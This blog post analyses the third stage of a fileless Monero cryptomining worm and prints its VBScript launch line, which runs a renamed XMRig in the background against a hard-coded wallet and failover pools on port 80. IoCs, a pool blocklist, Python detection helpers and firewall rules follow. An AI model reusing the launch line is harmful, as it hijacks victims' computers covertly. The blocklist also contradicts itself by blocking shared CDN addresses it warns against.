Thursday, December 21, 2017

Part II on Monero Miner

Introducing the Third Stage
The info.vbs drops a compiled XMRig build, renamed to the innocuous-looking taskservice.exe so that it mimics a Windows service binary, and executes it. Note that, unlike the earlier stages, this final payload does land on disk in %temp%, so file hashes and a path-based rule (a CPU-hungry process spawned from %temp% by a wscript.exe/cscript.exe parent) apply to this stage. Once the XMRig PE is in place, the stage starts it with the following command.
 


Third Stage Execution of Monero Miner 


The Monero wallet address appears in clear text in the script. Monero's stealth addresses mean the chain cannot be queried for this address's balance or payouts, so the address is not traceable so far; the only visibility an investigator gets is whatever the mining pool itself exposes for that wallet.

Monero address: 46CJt5F7qiJiNhAFnSPN1G7BMTftxtpikUjt8QXRFwFH2c3e1h6QdJA5dFYpTXK27dEL9RN3H2vLc6eG2wGahxpBK5zmCuE

The miner is not pointed at a single server: the command line lists three pools, the first as primary and the other two as XMRig failover pools (each -o URL takes the -u wallet that follows it), all on TCP port 80 so that the stratum sessions look like plain HTTP to an egress filter:

stratum+tcp://pool.supportxmr.com:80
stratum+tcp://mine.xmrpool.net:80
stratum+tcp://pool.minemonero.pro:80

The launch line from the VBScript (w is the WScript.Shell object; -B runs XMRig in the background and the trailing 0 passed to Run hides the window):

w.run "%temp%\taskservice.exe -B -o stratum+tcp://pool.supportxmr.com:80 -u 46CJt5F7qiJiNhAFnSPN1G7BMTftxtpikUjt8QXRFwFH2c3e1h6QdJA5dFYpTXK27dEL9RN3H2vLc6eG2wGahxpBK5zmCuE -o stratum+tcp://mine.xmrpool.net:80 -u 46CJt5F7qiJiNhAFnSPN1G7BMTftxtpikUjt8QXRFwFH2c3e1h6QdJA5dFYpTXK27dEL9RN3H2vLc6eG2wGahxpBK5zmCuE -o stratum+tcp://pool.minemonero.pro:80 -u 46CJt5F7qiJiNhAFnSPN1G7BMTftxtpikUjt8QXRFwFH2c3e1h6QdJA5dFYpTXK27dEL9RN3H2vLc6eG2wGahxpBK5zmCuE -p x" ,0
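A launch line like the one above is exactly what lands in a process-creation log (Sysmon Event ID 1, EDR telemetry). The following is an added example, not code from the original post: it parses an XMRig-style command line according to the XMRig CLI rules (each -o/--url starts a new pool entry, the -u/--user and -p/--pass that follow bind to it, -B/--background detaches the miner) and turns it into blockable indicators plus hunting flags. The sample command line is the w.run argument from above, reconstructed here; the Monero-address regex and the "web port" heuristic are this example's own assumptions.

```python
"""Extract IoCs and evasion flags from an XMRig-style command line.

Added example, not code from the original post. The Monero-address regex and
the WEB_PORTS heuristic are assumptions of this example, not part of the
malware analysis.
"""
import re
from urllib.parse import urlsplit

WALLET = ("46CJt5F7qiJiNhAFnSPN1G7BMTftxtpikUjt8QXRFwFH2c3e1h6QdJA5dFYpTXK27d"
          "EL9RN3H2vLc6eG2wGahxpBK5zmCuE")

# Constructed input: the argument of the w.run call, without the VBScript wrapper.
SAMPLE_CMDLINE = (
    r"%temp%\taskservice.exe -B"
    f" -o stratum+tcp://pool.supportxmr.com:80 -u {WALLET}"
    f" -o stratum+tcp://mine.xmrpool.net:80 -u {WALLET}"
    f" -o stratum+tcp://pool.minemonero.pro:80 -u {WALLET} -p x"
)

WEB_PORTS = {80, 443, 8080, 8443}  # assumption: ports picked to pass "web only" egress rules
MONERO_ADDR = re.compile(r"^4[1-9A-HJ-NP-Za-km-z]{94}$")  # standard 95-char base58 address


def parse_xmrig_cmdline(cmdline):
    """Return the binary, the background flag and the ordered pool list with credentials."""
    argv = cmdline.split()  # assumption: no quoted arguments, as in the sample
    result = {"binary": argv[0], "background": False, "pools": []}
    i = 1
    while i < len(argv):
        tok = argv[i]
        if tok in ("-B", "--background"):
            result["background"] = True
            i += 1
            continue
        if tok.startswith("--") and "=" in tok:        # --url=... form
            tok, val = tok.split("=", 1)
            i += 1
        elif tok in ("-o", "--url", "-u", "--user", "-p", "--pass"):
            val = argv[i + 1] if i + 1 < len(argv) else None
            i += 2
        else:                                          # option we do not care about
            i += 1
            continue
        if tok in ("-o", "--url"):
            u = urlsplit(val if "://" in val else "stratum+tcp://" + val)
            result["pools"].append({"scheme": u.scheme, "host": u.hostname,
                                    "port": u.port, "user": None, "pass": None})
        elif result["pools"]:                          # -u/-p bind to the most recent -o
            result["pools"][-1]["user" if tok in ("-u", "--user") else "pass"] = val
    return result


def extract_iocs(parsed):
    """Flatten the parse into blockable indicators plus heuristic hunting flags."""
    pools = parsed["pools"]
    wallets = sorted({p["user"] for p in pools if p["user"]})
    flags = []
    if "temp" in parsed["binary"].lower():
        flags.append("miner launched from a temp directory")
    if parsed["background"]:
        flags.append("-B: runs detached, no console window for the user to notice")
    if len(pools) > 1:
        flags.append(f"{len(pools)} failover pools: blocking a single host is not enough")
    if any(p["port"] in WEB_PORTS for p in pools):
        flags.append("stratum on a web port: egress rules allowing only 80/443 will not stop it")
    return {
        "wallets": wallets,
        "pools": [f'{p["host"]}:{p["port"]}' for p in pools],
        "unrecognised_wallets": [w for w in wallets if not MONERO_ADDR.match(w)],
        "flags": flags,
    }


if __name__ == "__main__":
    for key, value in extract_iocs(parse_xmrig_cmdline(SAMPLE_CMDLINE)).items():
        print(f"{key}: {value}")
```

Running it on the sample yields the three pool hosts, the single wallet and four flags; feed it the CommandLine field of your process-creation events and alert on any hit with a stratum scheme or a recognised wallet, regardless of what the binary is called.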
Many other sections of the script deserve analysis, but for now let's stop here.
IOC.
Please find some of the most interesting IoCs for your convenience.

- URL: http://118.184.48.95:8000/
- Monero Address: 46CJt5F7qiJiNhAFnSPN1G7BMTftxtpikUjt8QXRFwFH2c3e1h6QdJA5dFYpTXK27dEL9RN3H2vLc6eG2wGahxpBK5zmCuE
- Sha256: 19e15a4288e109405f0181d921d3645e4622c87c4050004357355b7a9bf862cc
- Sha256: 038d4ef30a0bfebe3bfd48a5b6fed1b47d1e9b2ed737e8ca0447d6b1848ce309

Conclusion.
We are facing one of the first complex deliveries of crypto-mining malware. Everybody knows CryptoMine, BitCoinMiner and Adylkuzz, which basically dropped a coin miner on the target machine, so if you are wondering "Why, Marco, do you write 'one of the first malware'?", well, what I actually wrote is one of the first "complex" deliveries. The usual coin-mining malware is delivered with no propagation module, no exploitation module and no file-less techniques. The way this Monero CPU miner has been delivered, by contrast, relies on in-memory inflation: the unpacked malware is not saved to the hard drive (a technique to bypass some anti-virus engines) but is inflated directly in memory and called from memory itself.

We can consider this malware a latest-generation, all-in-memory CryptoWorm.

Another interesting observation, at least from my personal point of view, concerns the first stage. Why did the attacker include this seemingly useless stage? It appears to add nothing: it is a mere dropper with no controls and no evasion. The attacker could have shipped the second stage directly, with the first stage folded into it, for a smaller network fingerprint. So why did the attacker decide to deliver the CryptoWorm through the first stage? Maybe the first stage is part of a bigger framework? Are we facing a new generation of malware generator kits?

 

List of IPs/domains to be blocked

Pool name                IP
bohemianpool.com         80.188.53.27
dwarfpool.com            104.25.51.105
fasthash.net             198.255.38.242
iwanttoearn.money        212.175.35.221
minemonero.gq            163.172.174.140
minercircle.com          163.172.80.114
minexmr.com              104.25.209.15
minexmr.org              52.8.187.102
mixpools.org             149.202.175.112
monero.crypto-pool.fr    212.83.158.14
monero.hashvault.pro     107.191.46.207
monero.lindon-pool.win   151.80.41.29
monero.miners.pro        194.247.13.160
monero.riefly.id         103.10.61.52
monero.us.to             174.138.53.64
monerohash.com           198.251.81.82
monerominer.life         138.197.199.239
moneroocean.stream       104.24.121.33
moneropool.com           104.27.159.16
moneropool.nl            139.162.158.112
moriaxmr.com             178.254.29.69
nanopool.org             104.27.111.34
pool.xmr.pt              94.46.164.183
pooldd.com               104.27.150.118
poolto.be                130.240.22.202
ratchetmining.com        136.144.137.125
supportxmr.com           88.99.138.74
teracycle.net            163.172.174.140
usxmrpool.com            167.88.115.253
viaxmr.com               104.24.106.79
xmr.alimabi.cn           61.160.224.169
xmr.mypool.online        78.47.63.190
xmr.prohash.net          138.201.206.47
xmr.suprnova.cc          145.239.65.23
xmrpool.eu               176.31.105.53
xmrpool.net              107.167.87.242
xmrpool.xyz              165.227.65.65

Two caveats before applying this list. The 104.24.x, 104.25.x and 104.27.x entries are Cloudflare edge addresses shared with many unrelated sites, so block those pools by domain (DNS sinkhole or proxy) rather than by IP. Pool IPs also rotate, so treat the IP column as a point-in-time snapshot; and note that pool.minemonero.pro, one of the three pools in the command line above, does not appear in this table.
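Before turning a list like this into firewall rules it is worth deduplicating it and separating the IPs that belong to shared CDN edges from the ones that can be blocked outright. The following is an added example, not from the original post: it triages a subset of the table above (constructed here; one IP is listed twice, exactly as in the table) and emits outbound Windows firewall rules for the safely blockable entries. The SHARED_RANGES prefixes are a hardcoded subset of Cloudflare's published ranges and are this example's assumption; fetch the current list before relying on them.

```python
"""Sanity-check a mining-pool blocklist before turning it into firewall rules.

Added example, not code from the original post. SHARED_RANGES is an assumed
subset of Cloudflare's published prefixes; POOLS is a subset of the table above.
"""
import ipaddress

# Assumption: a partial, hardcoded list of Cloudflare edge prefixes.
SHARED_RANGES = [ipaddress.ip_network(n) for n in ("104.16.0.0/13", "104.24.0.0/14")]

# Constructed input: eight rows copied from the table above (163.172.174.140 appears twice).
POOLS = [
    ("bohemianpool.com", "80.188.53.27"),
    ("dwarfpool.com", "104.25.51.105"),
    ("minemonero.gq", "163.172.174.140"),
    ("teracycle.net", "163.172.174.140"),
    ("nanopool.org", "104.27.111.34"),
    ("supportxmr.com", "88.99.138.74"),
    ("xmrpool.net", "107.167.87.242"),
    ("xmrpool.xyz", "165.227.65.65"),
]


def is_shared_edge(ip):
    """True when the address sits in a CDN range shared with unrelated sites."""
    addr = ipaddress.ip_address(ip)
    return any(addr in net for net in SHARED_RANGES)


def triage(pools):
    """Split into (domain, ip) pairs safe to block by IP and pairs needing a domain-level control."""
    seen, block, shared = set(), [], []
    for domain, ip in pools:
        if ip in seen:  # one host serving several pool names needs one rule, not two
            continue
        seen.add(ip)
        (shared if is_shared_edge(ip) else block).append((domain, ip))
    return block, shared


def netsh_rules(entries, direction="out"):
    """Outbound rules: the miner dials out to the pool, so dir=in would not stop it."""
    return [
        f'netsh advfirewall firewall add rule name="Block XMR pool {domain}" '
        f"dir={direction} interface=any action=block remoteip={ip}/32"
        for domain, ip in entries
    ]


if __name__ == "__main__":
    blockable, needs_domain_block = triage(POOLS)
    print("\n".join(netsh_rules(blockable)))
    for domain, ip in needs_domain_block:
        print(f"REM {domain} ({ip}) is a shared edge: block the domain at DNS/proxy instead")
```

On the sample rows this produces five outbound rules and defers dwarfpool.com and nanopool.org to a domain-level block; the duplicate 163.172.174.140 entry yields a single rule.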
  


Run these commands from an elevated prompt to block the connections at the Windows firewall. The miner dials out to the pools, so the rules must be outbound (dir=out); the same rules with dir=in would only drop unsolicited inbound packets from those hosts and leave the stratum sessions untouched. Duplicate entries have been removed, and pool IPs change over time, so pair these rules with the domain block list above and review them periodically.

netsh advfirewall firewall add rule name="IP Block" dir=out interface=any action=block remoteip=94.23.41.130/32
netsh advfirewall firewall add rule name="IP Block" dir=out interface=any action=block remoteip=37.59.43.131/32
netsh advfirewall firewall add rule name="IP Block" dir=out interface=any action=block remoteip=37.59.44.193/32
netsh advfirewall firewall add rule name="IP Block" dir=out interface=any action=block remoteip=37.59.45.174/32
netsh advfirewall firewall add rule name="IP Block" dir=out interface=any action=block remoteip=37.59.54.205/32
netsh advfirewall firewall add rule name="IP Block" dir=out interface=any action=block remoteip=37.59.55.60/32
netsh advfirewall firewall add rule name="IP Block" dir=out interface=any action=block remoteip=37.187.154.79/32
netsh advfirewall firewall add rule name="IP Block" dir=out interface=any action=block remoteip=46.105.103.169/32
netsh advfirewall firewall add rule name="IP Block" dir=out interface=any action=block remoteip=78.46.89.102/32
netsh advfirewall firewall add rule name="IP Block" dir=out interface=any action=block remoteip=78.46.91.134/32
netsh advfirewall firewall add rule name="IP Block" dir=out interface=any action=block remoteip=78.46.91.171/32
netsh advfirewall firewall add rule name="IP Block" dir=out interface=any action=block remoteip=91.121.87.10/32
netsh advfirewall firewall add rule name="IP Block" dir=out interface=any action=block remoteip=94.23.206.130/32
netsh advfirewall firewall add rule name="IP Block" dir=out interface=any action=block remoteip=94.23.212.204/32
netsh advfirewall firewall add rule name="IP Block" dir=out interface=any action=block remoteip=94.130.164.60/32
netsh advfirewall firewall add rule name="IP Block" dir=out interface=any action=block remoteip=176.31.117.82/32
netsh advfirewall firewall add rule name="IP Block" dir=out interface=any action=block remoteip=178.63.48.196/32
netsh advfirewall firewall add rule name="IP Block" dir=out interface=any action=block remoteip=188.165.199.78/32
netsh advfirewall firewall add rule name="IP Block" dir=out interface=any action=block remoteip=188.165.214.76/32
netsh advfirewall firewall add rule name="IP Block" dir=out interface=any action=block remoteip=188.165.254.85/32

netsh advfirewall firewall add rule name="IP Block" dir=out interface=any action=block remoteip=80.188.53.27/32
netsh advfirewall firewall add rule name="IP Block" dir=out interface=any action=block remoteip=104.25.51.105/32
netsh advfirewall firewall add rule name="IP Block" dir=out interface=any action=block remoteip=198.255.38.242/32
netsh advfirewall firewall add rule name="IP Block" dir=out interface=any action=block remoteip=212.175.35.221/32
netsh advfirewall firewall add rule name="IP Block" dir=out interface=any action=block remoteip=163.172.174.140/32
netsh advfirewall firewall add rule name="IP Block" dir=out interface=any action=block remoteip=163.172.80.114/32
netsh advfirewall firewall add rule name="IP Block" dir=out interface=any action=block remoteip=104.25.209.15/32
netsh advfirewall firewall add rule name="IP Block" dir=out interface=any action=block remoteip=52.8.187.102/32
netsh advfirewall firewall add rule name="IP Block" dir=out interface=any action=block remoteip=149.202.175.112/32
netsh advfirewall firewall add rule name="IP Block" dir=out interface=any action=block remoteip=212.83.158.14/32
netsh advfirewall firewall add rule name="IP Block" dir=out interface=any action=block remoteip=107.191.46.207/32
netsh advfirewall firewall add rule name="IP Block" dir=out interface=any action=block remoteip=151.80.41.29/32
netsh advfirewall firewall add rule name="IP Block" dir=out interface=any action=block remoteip=194.247.13.160/32
netsh advfirewall firewall add rule name="IP Block" dir=out interface=any action=block remoteip=103.10.61.52/32
netsh advfirewall firewall add rule name="IP Block" dir=out interface=any action=block remoteip=174.138.53.64/32
netsh advfirewall firewall add rule name="IP Block" dir=out interface=any action=block remoteip=198.251.81.82/32
netsh advfirewall firewall add rule name="IP Block" dir=out interface=any action=block remoteip=138.197.199.239/32
netsh advfirewall firewall add rule name="IP Block" dir=out interface=any action=block remoteip=104.24.121.33/32
netsh advfirewall firewall add rule name="IP Block" dir=out interface=any action=block remoteip=104.27.159.16/32
netsh advfirewall firewall add rule name="IP Block" dir=out interface=any action=block remoteip=139.162.158.112/32
netsh advfirewall firewall add rule name="IP Block" dir=out interface=any action=block remoteip=178.254.29.69/32
netsh advfirewall firewall add rule name="IP Block" dir=out interface=any action=block remoteip=104.27.111.34/32
netsh advfirewall firewall add rule name="IP Block" dir=out interface=any action=block remoteip=94.46.164.183/32
netsh advfirewall firewall add rule name="IP Block" dir=out interface=any action=block remoteip=104.27.150.118/32
netsh advfirewall firewall add rule name="IP Block" dir=out interface=any action=block remoteip=130.240.22.202/32
netsh advfirewall firewall add rule name="IP Block" dir=out interface=any action=block remoteip=136.144.137.125/32
netsh advfirewall firewall add rule name="IP Block" dir=out interface=any action=block remoteip=88.99.138.74/32
netsh advfirewall firewall add rule name="IP Block" dir=out interface=any action=block remoteip=167.88.115.253/32
netsh advfirewall firewall add rule name="IP Block" dir=out interface=any action=block remoteip=104.24.106.79/32
netsh advfirewall firewall add rule name="IP Block" dir=out interface=any action=block remoteip=61.160.224.169/32
netsh advfirewall firewall add rule name="IP Block" dir=out interface=any action=block remoteip=78.47.63.190/32
netsh advfirewall firewall add rule name="IP Block" dir=out interface=any action=block remoteip=138.201.206.47/32
netsh advfirewall firewall add rule name="IP Block" dir=out interface=any action=block remoteip=145.239.65.23/32
netsh advfirewall firewall add rule name="IP Block" dir=out interface=any action=block remoteip=176.31.105.53/32
netsh advfirewall firewall add rule name="IP Block" dir=out interface=any action=block remoteip=107.167.87.242/32
netsh advfirewall firewall add rule name="IP Block" dir=out interface=any action=block remoteip=165.227.65.65/32
 
